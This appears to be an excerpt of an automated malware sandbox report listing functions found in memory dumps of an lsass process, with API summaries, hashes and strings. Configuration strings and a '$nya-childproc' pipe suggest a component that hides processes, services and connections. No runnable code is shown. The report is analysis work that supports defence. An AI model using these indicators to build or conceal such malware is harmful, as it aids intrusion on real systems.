• Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 2135414181-3572789727
• Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
• Instruction ID: 6a5a73e90e15d5065503e619210b3abc3386d86c0bf07523f252400ee6381c03
• Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
• Instruction Fuzzy Hash: F771E736218F5986EB209F66F8906D933B4FF84B88F481211DE4D57B6ADE78C4C6C780
Control-flow Graph (graph image not captured)
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
• Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
• Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
• Instruction ID: c9bf57815c647d5cb5a2bf4a54b90c79dd327f0def2c695701b12de31f15661d
• Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
• Instruction Fuzzy Hash: 91512B32218B8896EB24CF62F44839A77B1FB88F98F484124DA4D07759DF7CC08A8780
Control-flow Graph (graph image not captured)
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
• Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
• String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
• API String ID: 740688525-1880043860
• Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
• Instruction ID: 4972e08af1195b3f28e5aa5d2d33d3d318c4d8e495bad8b93d07054ccc4bb4d3
• Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
• Instruction Fuzzy Hash: 39516C31749F4C51EA149B66B8407E922B0AF48BB0F5C07259E3D4B7D6EFB8D4878690
Control-flow Graph (graph image not captured)
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
• Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: Heap$CounterInfoProcess$AllocFree
• String ID: \GPU Engine(*)\Running Time
• API String ID: 1943346504-1805530042
• Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
• Instruction ID: 422347752cb8a5a5f4ba61478ceba83143f2d89ceaa727bce76a7423e00b515b
• Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
• Instruction Fuzzy Hash: FF317C32A08F4897E721DF52B804799A3B4BB98B95F484525DE8D43626DF78C4D78780
Control-flow Graph (graph image not captured)
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
• Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: Heap$CounterInfoProcess$AllocFree
• String ID: \GPU Engine(*)\Utilization Percentage
• API String ID: 1943346504-3507739905
• Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
• Instruction ID: b2a5967eee084143195432e5f40e43866f6486d5eaa342772f780f2da15f402f
• Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
• Instruction Fuzzy Hash: D0318C31618F498BEB10DF22B884799B3B0BF84F95F4851259E8E43766EE78D4C38680
Control-flow Graph
Graph summary (edge list omitted): basic blocks 17d2dd5a22c-17d2dd5a6fb; no imported API calls appear in the graph, only internal calls (17d2dd5b144, 17d2dd5c388, 17d2dd59324, 17d2dd58070, 17d2dd5a6fc, 17d2dd59704, 17d2dd59a0c, 17d2dd599cc, 17d2dd595a4, 17d2dd5c2f4, 17d2dd599e0, 17d2dd5b1dc, 17d2dd59634, 17d2dd59838, 17d2dd5a96c, 17d2dd5a158, 17d2dd5b2cc, 17d2dd58f84, 17d2dd5ad28, 17d2dd59178).
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
• Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
• Instruction ID: a7143d3f81dc630082b136a90ca0f54496fd1e4b9adf58d3744d12870631f34a
• Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
• Instruction Fuzzy Hash: 59D17C7260CF988AEB20DB65A4403DD77B0FB45788F182115EA8D57B9ADBB4E5C6C700
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000003.1604607101.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_3_17d2dd20000_lsass.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
• Instruction ID: 310fc0b5922953b9c4234ef9c5d0874e37dd68400065c5e6711a8eed723815eb
• Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
• Instruction Fuzzy Hash: 03D16832648B888AEB609F65A4883ED77B0FB45798F185215EE8D57B9FDB34C5C2C700
Control-flow Graph
Graph summary (edge list omitted): basic blocks 17d2dd5104c-17d2dd511d0; imported APIs called: RegQueryInfoKeyW, RegEnumValueW, GetProcessHeap, HeapAlloc, HeapFree.
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
• Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
• Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
• Instruction ID: 3cb689649fdd88a86a4149668db6177ce478f31cb262a3dabc8e4b9b4df4e1f0
• Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
• Instruction Fuzzy Hash: 69412D72218F84DAE760CF61F44479A77B1F788B98F488129DB8907759DF78C58ACB80

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\$nya-childproc
                                                  • API String ID: 166002920-3933612297
                                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction ID: 709f8d1fd23cfc63cb23fbc949a151c789b254d588f567ccc9f9cf4f3d996b29
                                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction Fuzzy Hash: 50114C3261CB4482F7108B21F41439A7770FB89BD4F984315EB5E02AA9CF7CC18ACB80

                                                  Control-flow Graph (legend: Executed / Not Executed; rendered graph for the function at 17d2dd57c50 not reproduced here, edge list omitted)
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: 4c8f37232e856023605888e2b1735ea5b4ca42d108cd0c214cd9eba3c911007f
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: 4F81C23070CF4D96FA60EB65B8413E966B1AF85B84F6C4015AA0D47397DBB8C8CB8740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000003.1604607101.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_3_17d2dd20000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: e277e449b48480b4843398206f7a681ef9f1fae92a2cb6f22c3226b47e71a24d
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: A381A03060DF4DA6FAB59B65B84A3D962B1AF86780F5C50159D0C4779FDA38C9CB8B00
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59B31
                                                  • GetLastError.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59B69
                                                  • FreeLibrary.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction ID: f48c940c265e2daad92e5c1e5b6921450fbf53ad875bcdb193b5a88706f70175
                                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction Fuzzy Hash: 6A31AE3121AF4891FF119B16B8807E523B4BF58BA0F9D0625ED1D4B796EF78E4C68390
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: 57ad0a87101fc014a47693d5d53f1c791703df7ebf8c7a55728d0379093e6ab6
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: 1C116031718F4486E7608B56F854759B7B4FB88BE4F584224EA5E87B99CF3CC48687C0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction ID: 8cf41acd218546793b6ed0d90e458c47a19c5a17e27bbef3670ec55f879e2049
                                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                  • Instruction Fuzzy Hash: 3CD17B76209F8C85EA70DB1AF49439A77B0F788B88F540156EA8D477A6DF7CC592CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: b487a383841d198bad61ad671097e45e90b99253259c84bcebb8eb2ffb1bb39e
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: EB51AF35209F4995FB06DF68FC913D823B1BF04744F885915A92D067AAEFB8D5ABC380
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $nya-
                                                  • API String ID: 756756679-1266920357
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: e44f6ab9cc7e4a7ef97263a8d5e3176e6a8d105c8800c8036b3f4b44f3aa658b
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: 8D316B32709F5987EA15DF16B9446A9A3B0BF54B84F0C4428DF8C47B56EF78C4E28740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: d555153932640f8d0347a3364c120d1ec568d657c151868c23cbfcce845ca8fc
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: B2113D31218B4842FA14673578117EA2271AF857A1F9C4624E96E967CBDEB8C4C34641
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: 5d1b500fe26d28fa52f1e2ea028b920d62cefd2ec870b9f025740f9f7ca69692
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: 36010535708B8886EB24DB12B85839962B1FB88FC0F8840359E9D43759DE79C9CAC7C0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: be16916117c4c5d8465fbac92c3bfb4ddd2eef5abb0f374461f5f83441254e7b
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: 1E014C75219F4882FB249B61F84879973B0BF49B45F080128DA8D073AAEF3DC0DAC780
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: 682f90f5b637f35a2c3d5446783d20b17b34457fb52783b3e1abf76f5c572ba5
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: 38F04F72308B8992EB208F25F9843997371FB45BC8F884021DB4D4695ADE6CC6CACB80
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
